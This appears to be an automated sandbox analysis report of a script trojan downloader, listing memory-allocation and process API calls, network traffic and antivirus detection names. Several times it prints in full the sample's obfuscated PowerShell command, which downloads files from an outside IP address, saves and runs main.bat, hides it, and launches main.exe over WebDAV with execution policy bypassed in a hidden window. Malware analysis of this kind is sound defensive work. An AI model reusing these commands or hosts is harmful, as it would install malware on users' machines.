stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02799000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\main.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
filepath: powershell.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 2920
thread_handle: 0x00000088
process_identifier: 2916
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data received HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 00:41:20 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
Data received C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
Data sent soe-Ø&%ÑbPºÄ_;é 6H­“z?âD¨ö+É/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
Data sent soe-Ø&yÎ 8ŒUÊñ‚.O!ÒÜË hb®Þgõ/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
Data sent GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
host 91.207.183.9
file C:\Users\test22\AppData\Roaming\main.bat
Time & API Arguments Status Return Repeated

send

 buffer: soe-Ø&%ÑbPºÄ_;é 6H­“z?âD¨ö+É/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
socket: 1432
sent: 120
1 120 0

send

 buffer: soe-Ø&yÎ 8ŒUÊñ‚.O!ÒÜË hb®Þgõ/5 ÀÀÀ À 28.ÿwww2.lunapic.com  
socket: 1432
sent: 120
1 120 0

send

 buffer: GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
socket: 1132
sent: 75
1 75 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\main.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\main.bat
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
Tencent Script.Trojan-Downloader.Generic.Xdkl
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
DrWeb Trojan.DownLoader46.24389
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
ALYac VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
MAX malware (ai score=82)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]